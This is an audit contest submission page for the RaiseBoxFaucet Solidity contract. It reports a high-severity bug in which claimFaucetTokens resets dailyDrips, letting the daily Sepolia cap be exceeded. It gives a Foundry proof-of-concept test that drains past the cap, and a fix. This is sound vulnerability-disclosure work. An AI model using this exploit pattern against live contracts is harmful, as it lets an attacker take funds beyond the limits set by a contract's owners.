Raisebox Faucet

First Flight #50

Beginner FriendlySolidity

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

`RaiseBoxFaucet::claimFaucetTokens` resets `RaiseBoxFaucet::dailyDrips` when the caller `hasClaimedEth`, potentially allowing more Sepolia to be claimed in a day than the `RaiseBoxFaucet::dailySepEthCap`

darkfox

Description

Each claimer can receive 0.005 Sepolia from the faucet the first time they call claimFaucetTokens, assuming there is enough Sepolia in the contract and the dailySepEthCap has not been reached. When a address has claimed Sepolia from the faucet, it is mapped to true in hasClaimedEth.

However, if a user has previously claimed Sepolia or the owner has paused the Sepolia faucet, dailyDrips, which tracks how much Sepolia has been claimed in a day, will be reset to 0. If dailyDrips is reset to 0 in this way, it will not be an accurate count of the amount of Sepolia that has been claimed that day, so the daily cap can be surpassed.

While this is possible, the DeployRaiseBoxFaucet script is currently set up to deploy RaiseBoxFaucet with an amount to drip of 0.005 Sepolia and a daily cap of 1 Sepolia. This would take 200 claims from the faucet to reach the daily limit, but the RaiseBoxFaucet contract deploys with a dailyClaimLimit of 100. If the dailyClaimLimit is increased by the owner with adjustDailyClaimLimit, then then dailySepEthCap can be exploited.

function claimFaucetTokens() public {

// Checks

faucetClaimer = msg.sender;

...

// drip sepolia eth to first time claimers if supply hasn't ran out or sepolia drip not paused**

// still checks

if (!hasClaimedEth[faucetClaimer] && !sepEthDripsPaused) {

...

} else {

@> dailyDrips = 0;

}

...

}

Risk

Likelihood:

This can be exploited in the event the owner raises the dailyClaimLimit to allow for more claims than the dailySepEthCap would allow. Assuming the contract was deployed with the DeployRaiseBoxFaucet script, the dailyClaimLimit would need to be over 200 for the exploit that have any effect.

Impact:

Users would be able to claim more Sepolia from the contract than the faucet intends.

Proof of Concept

The contract owner increases the daily claim limit to more than 200.
An attacker calls claimFaucetTokens to receive faucet tokens as well as claiming 0.005 Sepolia for being a first time claimer.
The attacker waits 3 days to be able to claim faucet tokens again.
200 users have claimed their first-time Sepolia reward, some of which may have been the attacker's wallets.
The attacker calls claimFaucetTokens from their original address, which has already received the Sepolia reward. The daily drip count has been reset, and more addresses can claim their first time reward.

function testSepoliaDailyLimitCanBeBypassed() public {

// daily claim limit must be above 200 to allow for this

// because 1000 / 0.005 = 200, so 200 users can normally claim sepolia in a day

vm.prank(owner);

raiseBoxFaucet.adjustDailyClaimLimit(1000, true);

// the attacker claims their Sepolia

vm.prank(user);

raiseBoxFaucet.claimFaucetTokens();

// now, 3 days later, the attacker can claim again but cannot claim more sepolia

vm.warp(block.timestamp + 3 days);

uint256 faucetEthBalanceBeginningOfDay = address(raiseBoxFaucet).balance;

// up to daily claim limit

for(uint256 i = 1; i < 200; i++) {

vm.prank(address(uint160(i + 100)));

raiseBoxFaucet.claimFaucetTokens();

}

// user resets daily limit by claiming again

vm.prank(user);

raiseBoxFaucet.claimFaucetTokens();

for(uint256 i = 1; i < 200; i++) {

vm.prank(address(uint160(i + 300)));

raiseBoxFaucet.claimFaucetTokens();

}

uint256 faucetEthBalanceEndOfDay = address(raiseBoxFaucet).balance;

console.log("Daily Sepolia Claim Limit: ", raiseBoxFaucet.dailySepEthCap());

console.log("Contract Sepolia Balance Beginning Of Day: ", faucetEthBalanceBeginningOfDay);

console.log("Contract Sepolia Balance End of Day: ", faucetEthBalanceEndOfDay);

assert(faucetEthBalanceEndOfDay < faucetEthBalanceBeginningOfDay - raiseBoxFaucet.dailySepEthCap());

}

The test shows that an attacker can reset daily claims, so more Sepolia can be claimed from the contract then expected.

Recommended Mitigation

Remove the else block of the Sepolia reward section in claimFaucetTokens.

function claimFaucetTokens() public {

// Checks

faucetClaimer = msg.sender;

...

// drip sepolia eth to first time claimers if supply hasn't ran out or sepolia drip not paused**

// still checks

if (!hasClaimedEth[faucetClaimer] && !sepEthDripsPaused) {

...

+ }

- } else {

- dailyDrips = 0;

- }

...

}

Updates

Lead Judging Commences

inallhonesty Lead Judge 6 days ago

Submission Judgement Published

Validated

Assigned finding tags:

dailyDrips Reset Bug

Rewards breakdown

nSLOC

157

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.